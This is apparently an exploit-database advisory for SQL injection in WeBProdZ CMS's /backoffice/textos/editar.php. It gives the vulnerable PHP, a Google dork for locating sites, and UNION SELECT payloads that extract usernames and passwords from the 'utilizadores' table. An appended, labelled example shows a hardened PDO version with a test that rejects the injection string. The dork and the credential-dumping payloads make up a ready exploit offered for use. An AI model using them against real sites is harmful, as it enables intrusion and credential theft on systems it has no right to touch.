
# Title : WeBProdZ CMS SQL Injection Vulnerability
# Published : 2010-05-06
# Author : MasterGipy



_____________________________________________________________
   
[$] Exploit Title     : WeBProdZ CMS SQL Injection Vulnerability
[$] Date              : 06-05-2010            
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : SQL Injection Vulnerability
[$] Google Dork       : "Desenvolvido por WeBProdZ"

[$] Vulnerable code in /backoffice/textos/editar.php

<?php
    include_once("../../ligacao/connDB.php");
    // $_GET["id"] is concatenated into the query unquoted and unvalidated
    $sql = "select * from textos where idtextos=".$_GET["id"];

    $j2 = mysql_query($sql);
    $o = mysql_fetch_object($j2);
?>

[$] Exploit

[+] http://[site]/backoffice/textos/editar.php?id=1  <- SQL

[+] sql_1: -1 UNION ALL SELECT 1,2,3--
[+] sql_2: -1 UNION ALL SELECT 1,2,concat(username,char(58),password)+from+utilizadores--
[+] sql_3: -1 UNION ALL SELECT 1,2,concat(username,char(58),password_ori)+from+utilizadores--
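
A hardened form of the lookup in editar.php, as an added example (not part of the original advisory and not WeBProdZ code). It assumes PDO in place of the removed mysql_* API; fetch_texto(), the titulo/texto column names and the in-memory SQLite table are hypothetical and constructed for the demo.

```php
<?php
declare(strict_types=1);

// Hypothetical replacement for the query in /backoffice/textos/editar.php.
// Returns the row as an object, or null if the id is invalid or unknown.
function fetch_texto(PDO $db, $rawId): ?object
{
    // Accept only a positive integer; arrays, null and strings with SQL
    // appended fail validation and never reach the database.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The value is bound as a typed parameter instead of being concatenated.
    $stmt = $db->prepare('SELECT * FROM textos WHERE idtextos = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_OBJ);
    return $row === false ? null : $row;
}

// Constructed test data: a three-column table, matching the column count
// implied by the advisory (column names other than idtextos are assumed).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE textos (idtextos INTEGER PRIMARY KEY, titulo TEXT, texto TEXT)');
$db->exec("INSERT INTO textos VALUES (1, 'Sobre', 'Texto de exemplo')");

// Valid id, unknown id, the advisory's sql_1 string, and a non-numeric value.
$inputs = ['1', '2', '-1 UNION ALL SELECT 1,2,3--', 'abc'];
foreach ($inputs as $raw) {
    $row = fetch_texto($db, $raw);
    printf("%-30s => %s\n", json_encode($raw),
        $row !== null ? "row {$row->idtextos}" : 'no row returned');
}
// In editar.php itself, a null result would map to an HTTP 404 response
// rather than rendering the edit form.
```

Only the first input returns a row; the sql_1 string is rejected by the integer check before any query is prepared.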


[$] Greetings from PORTUGAL ^^